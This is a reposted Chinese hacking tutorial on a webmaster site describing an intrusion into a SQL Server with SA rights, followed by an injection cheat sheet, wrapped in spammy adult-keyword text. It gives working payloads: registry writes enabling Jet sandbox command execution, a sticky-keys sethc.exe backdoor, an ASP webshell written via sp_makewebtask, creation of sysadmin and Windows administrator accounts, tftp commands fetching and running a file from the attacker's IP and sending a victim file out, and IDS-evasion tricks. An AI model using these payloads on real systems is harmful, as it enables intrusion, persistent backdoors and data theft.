亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际

17站長網

17站長網 首頁 安全 安全教程 查看內容

一次SA權限入侵和小議SA提權

2022-9-24 10:20| 查看: 2516 |來源: 互聯網

來自草哲的blog 嘗試在NB里面恢復CMDSHELL、OACREAT都沒有成功,所以開啟SQLSERVERAGENT ;exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' ...

來自草哲的blog

嘗試在NB里面恢復CMDSHELL、OACREAT都沒有成功,所以開啟SQLSERVERAGENT


;exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT';--


  還是沒有成功,無奈之中希望寄托于沙盒模式,執行如下語句開啟沙盒模式


;execmaster..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--


  回顯成功,進一步調用oledb執行系統命令


and 0<>(select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd /c echo 1 >c:\1.txt")'))--


  回顯500,明顯出錯了,沙盒模式也暫且放下 既然可以寫注冊表,那一定可以讀注冊表,那先讀讀終端端口看看。

  是默認的3389但是我無法連接,或許是沒開終端服務,或許是防火墻屏蔽,不得而知,一定想知道我為什么要連接終端吧,下面看這段語句。


declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';



declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';


  大家一定記得最近很流行的SHIFT后吧,以上兩段語句就是利用FSO組件的讀寫權限替換粘拈鍵為桌面的啟動程序EXPLORER,如果替換成功那么執行5次SHIFT后就可以直接執行EXPLORER.EXE開啟桌面,但是連不上遠程這個方法也就不能用了。當然以上的命令需要OACREAT的支持,我也就是抱著僥幸的心理試試看。假設OACREAT沒有刪,我們還可以利用以下語句執行系統命令。


;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user jxsaqjh 1234 /add';--



;DECLARE @shell INT EXEC SP_OAcreate 'Shell.Application',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user jxsaqjh 1234/add';--


  以上兩個語句也是利用OACREAT調用wscript.shell和Shell.Application組件執行系統命令,但是在這里我們是用不了的,因為不僅OACREAT不在,就連那兩個危險組件管理也寫了個批處理卸了。

萬般無奈下嘗試lOG備分拿只SHELL,可是備分的頁面卻是404,很顯然這個SA沒有備分的權限,還能怎么做?看下面:


;exec sp_makewebtask 'd:\zjkdj\zjkdj\zjkds\bake.asp,' select ''<%execute(request("a"))%>'' ';--


  利用sp_makewebtask這個存儲過程寫個馬進去,很幸運這個過程是能用的,成功得到SHELL,本來想傳xplog70.dll上去恢復xp_cmdshell存儲過程,但是執行恢復的時候發現這個過程是在的,然后在海洋里執行CMDSHELL執行系統命令,但是出現了這一句,

xpsql.cpp: 錯誤 2 來自 CreateProcess(第 737 行

  我暈啊,難道是CMD.EXE刪了?在NB里面列目錄查看SYSTEM32下的文件,果然沒有cmd.exe,這下終于真象大白了,原來不能執行系統命令的原因是每個存儲過程都是調用系統的cmd.exe,既然沒有cmd.exe那還怎么執行系統命令?管理還是下了辛苦的哦。

  整理下思路后我又想到了沙盒模式,因為啥盒模式調用的CMD不一定是系統自帶的,我們可以自己傳一個上去的,想到這里在WEB目錄下傳了個CMD.EXE然后在海洋里執行如下語句


select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("d:\zjkdj\zjkdj\zjkds\cmd.exe /c net start>D:\zjkdj\zjkdj\zjkds\1.txt")')--


  立刻到站點目錄下找1.txt,但是沒有發現,看來只能調用系統自帶的程序了,無聊的在SYSTEM32下亂逛,突然發現了command.com這個程序,哈哈,總算看到希望了!這是什么?我來告訴你吧,它也是系統自帶的執行系統命令的程序,和CMD.EXE的功能幾乎沒有區別,但是大小卻比CMD.EXE小幾十倍,既然不讓調用外部程序那我就調用內部程序,馬上就在海洋里修改好如下語句執行。


select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("command.com /c net start>D:\zjkdj\zjkdj\zjkds\1.txt")')--


  調用command.com執行系統命令,執行完成后在站點目錄下總算找到了1.txt

  哈哈,總算看到希望了,打開1.txt看看服務器開了什么服務,但是我卻看到一片空白,這是什么原因?難道?還是確定一下比較好,立刻轉到SYSTEM32下查看文件,令我吃驚的是居然沒有看到NET.EXE,怪不得一片空白呢,系統根本沒有net.exe這個程序,自然是什么也看不到,郁悶,管理員不是一般的變態啊!

  不過沒有關系,windows系統中還有一個叫net1.exe的程序功能是和net.exe一樣的哦,我們來調用它執行系統命令,語句如下


select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("command.com /c net1 start>D:\zjkdj\zjkdj\zjkds\1.txt")')--


  執行完畢后再看1.txt

  哈哈,成功了,入侵到了這里也就沒有什么繼續的必要了,因為我們已經有了系統權限,想做什么都隨自己愿意了,收拾收拾在管理員的桌面上寫個提醒.txt告訴他漏洞所在,讓他盡快修補吧!

  最后總結一下,在先前以為是系統的存儲過程刪掉了,但是后來隨著入侵的深入才發現過程并沒有刪,只是每個存儲過程都必須調用cmd.exe所以不能執行系統命令也是肯定的了,所以大家在入侵的時候一定要細心的分析整個過程,從中找出對自己有用的東西。

第二

一:命令簡介

[獲取全部數據庫名]


select name from master.dbo.sysdatabases where dbid=7 //dbid的值為7以上都是用戶數據庫


[獲得數據表名][將字段值更新為表名,再想法讀出這個字段的值就可得到表名]


select top 1 name from 數據庫名.dbo.sysobjects where xtype=’u’ and status>0 and name not in(’table’)


[獲得數據表字段名][將字段值更新為字段名,再想法讀出這個字段的值就可得到字段名]


select top 1 數據庫名.dbo.col_name(object_id(’要查詢的數據表名’),字段列如:1) [ where 條件]


通過SQLSERVER注入漏洞建數據庫管理員帳號和系統管理員帳號[當前帳號必須是SYSADMIN組]


news.asp?id=2;exec master.dbo.sp_addlogin test,test;-- //添加數據庫用戶用戶test,密碼為test
news.asp?id=2;exec master.dbo.sp_password test,123456,test;-- //如果想改密碼,則用這句(將test的密碼改為123456)
news.asp?id=2;exec master.dbo.sp_addsrvrolemember test,sysadmin;-- //將test加到sysadmin組,這個組的成員可執行任何操作
news.asp?id=2;exec master.dbo.xp_cmdshell ’net user test test /add’;-- //添加系統用戶test,密碼為test
news.asp?id=2;exec master.dbo.xp_cmdshell ’net localgroup administrators test /add’;-- //將系統用戶test提升為管理員


這樣,你在他的數據庫和系統內都留下了test管理員賬號了

下面是如何從你的服器下載文件file.exe后運行它[前提是你必須將你的電腦設為TFTP服務器,將69端口打開]


id=2; exec master.dbo.xp_cmdshell ’tftp –i 你的IP get file.exe’;--


然后運行這個文件:


id=2; exec master.dbo.xp_cmdshell ’file.exe’;--


下載服務器的文件file2.doc到本地TFTP服務器[文件必須存在]:


id=2; exec master.dbo.xp_cmdshell ’tftp –i 你的IP Put file2.doc’;--


繞過IDS的檢測[使用變量]


declare @a sysname set @a=’xp_’ ’cmdshell’ exec @a ’dir c:\’
declare @a sysname set @a=’xp’ ’_cm’ ’dshell’ exec @a ’dir c:\’


新加的:
建一個表。只有一個字段,類型為image,將asp內容寫入。導出數據庫為文件


backup database dbname to disk=’d:\web\db.asp’;


報錯得到系統操作系統和數據庫系統版本號


id=2 and 1<>(select @@VERSION);

tag標簽:SA權限 SA提權
本文最后更新于 2022-9-24 10:20,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:17tui@17tui.com
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际
        色丁香久综合在线久综合在线观看| 亚洲欧洲日韩在线| 成人精品小蝌蚪| 中文字幕一区二区三区乱码在线| eeuss鲁片一区二区三区在线观看 eeuss鲁片一区二区三区在线看 | 91在线免费视频观看| 99国产精品国产精品久久| 欧美一区二区三区视频免费播放| 欧美一级日韩免费不卡| 国产女同互慰高潮91漫画| 国产乱码字幕精品高清av| 欧美日韩国产影片| 日韩经典一区二区| 91麻豆自制传媒国产之光| 亚洲视频免费观看| 99re66热这里只有精品3直播| 91精品在线一区二区| 久久不见久久见免费视频1| 51精品久久久久久久蜜臀| 91蜜桃免费观看视频| 韩国中文字幕2020精品| 蜜臀久久99精品久久久画质超高清| 懂色av一区二区三区蜜臀| 国内精品久久久久影院薰衣草| 日韩和欧美一区二区三区| 久久成人麻豆午夜电影| 风流少妇一区二区| 国产精品18久久久| 国产69精品久久777的优势| 欧美大度的电影原声| 91成人看片片| 一本一本大道香蕉久在线精品| 天天做天天摸天天爽国产一区| 日韩欧美一级精品久久| 国产成人免费网站| 午夜精品视频一区| 视频在线观看91| 一区二区三区精品视频在线| 亚洲一区二区三区中文字幕在线| 国产精品午夜在线观看| 亚洲国产视频在线| 成人亚洲一区二区一| 日本少妇一区二区| 免费在线观看精品| 91伊人久久大香线蕉| 最近中文字幕一区二区三区| 成人av动漫网站| 91精品国产91热久久久做人人| 欧美一级在线免费| 久久综合九色综合97婷婷| 成人免费视频国产在线观看| 专区另类欧美日韩| 风间由美性色一区二区三区| 午夜精品久久久久久久99樱桃| 欧洲一区二区三区在线| 国产成人精品三级| 亚洲成人av免费| 97se狠狠狠综合亚洲狠狠| 欧美激情在线一区二区三区| 99久久久久久| kk眼镜猥琐国模调教系列一区二区| 亚洲午夜久久久久久久久久久 | 91在线精品秘密一区二区| 在线观看亚洲一区| 99国产精品久久久久久久久久 | 青青草成人在线观看| www.亚洲国产| 亚洲国产一区二区三区| 性做久久久久久久久| 亚洲日本欧美天堂| 粉嫩高潮美女一区二区三区| 国产人成亚洲第一网站在线播放| 裸体一区二区三区| 国产精品视频你懂的| 91同城在线观看| 中文字幕一区在线| 国产成人免费9x9x人网站视频| 国产美女精品在线| bt欧美亚洲午夜电影天堂| 一区二区三区四区中文字幕| 美腿丝袜亚洲三区| av一区二区不卡| 91成人在线精品| 日韩欧美卡一卡二| 精品午夜一区二区三区在线观看| 国产亚洲精品aa午夜观看| 欧美日韩在线播放三区四区| 国产精品久久久久aaaa樱花 | 国产精品成人免费| 久久婷婷综合激情| 国产一区二区0| 91久久久免费一区二区| 久久日一线二线三线suv| 九九热在线视频观看这里只有精品| 亚洲一区二区视频在线观看| 中文字幕 久热精品 视频在线 | 亚洲人成网站影音先锋播放| 日韩一卡二卡三卡国产欧美| 亚洲精品一二三| 久久99国产精品麻豆| 91精品国产麻豆国产自产在线 | 日本电影亚洲天堂一区| 国产精品久久久久久久久搜平片 | 日韩二区三区在线观看| 久久久综合九色合综国产精品| 国产盗摄视频一区二区三区| 欧美日本乱大交xxxxx| 欧美一卡二卡在线| 99久久婷婷国产综合精品| 国产精品乱码久久久久久| 欧美另类一区二区三区| 久久理论电影网| 在线欧美日韩国产| 亚洲一线二线三线视频| 777午夜精品视频在线播放| 欧美一区午夜视频在线观看| 欧美丝袜丝交足nylons图片| 免费观看91视频大全| 中文字幕不卡的av| 亚洲成av人**亚洲成av**| 色综合视频在线观看| 中文字幕一区二区在线观看| 中文字幕一区二区在线观看| 成人免费毛片app| 91精品国产aⅴ一区二区| 亚洲一区二区综合| 国产69精品久久777的优势| 精品一区二区三区香蕉蜜桃| 成人h动漫精品一区二| 国产精品99久久久久久久vr| 福利一区在线观看| www.日韩精品| 26uuu欧美| 亚洲欧洲三级电影| 成人午夜看片网址| 国产人妖乱国产精品人妖| 欧美另类z0zxhd电影| 欧美美女黄视频| 国产女同互慰高潮91漫画| 中文字幕第一页久久| 亚洲美女在线一区| 亚洲精品第一国产综合野| 午夜精品福利一区二区三区av| 日韩美女久久久| 免费精品视频在线| 成人综合在线观看| 91精品国产综合久久久蜜臀图片 | 亚洲精品国产a| 91在线精品一区二区三区| 91麻豆国产福利精品| 中文字幕免费不卡| 亚洲国产高清不卡| 亚洲影视在线观看| 国产成人日日夜夜| 91精品国产免费| 亚洲自拍偷拍av| 暴力调教一区二区三区| 欧美电影免费观看高清完整版在 | 黄一区二区三区| 裸体一区二区三区| www.亚洲国产| 1000部国产精品成人观看| 男女激情视频一区| 欧美二区乱c少妇| 亚洲男人的天堂一区二区| 蜜桃av一区二区三区| 成人蜜臀av电影| 久久精品日韩一区二区三区| 国产精品人妖ts系列视频| 亚洲成av人片www| 91在线观看下载| 久久综合久久久久88| 亚洲精品中文在线影院| 国产成人亚洲综合a∨婷婷| 91久久精品一区二区三| 国产日韩欧美制服另类| 精品一区二区三区视频| a级精品国产片在线观看| 久久久亚洲精品石原莉奈| 国产一区在线不卡| 久久综合给合久久狠狠狠97色69| 亚洲一区二区三区国产| 欧美亚洲综合另类| 国产婷婷色一区二区三区| 亚洲精品综合在线| 欧美激情在线观看视频免费| 欧美国产激情一区二区三区蜜月 | 国产成人亚洲综合a∨婷婷| 成人小视频在线| 欧美大胆人体bbbb| 欧美日韩精品电影| 国产激情精品久久久第一区二区| 麻豆国产一区二区| 精品一区二区av| 成人午夜视频网站| 成人av在线电影| **欧美大码日韩| 久久国产视频网| 中文字幕在线一区免费| 911国产精品|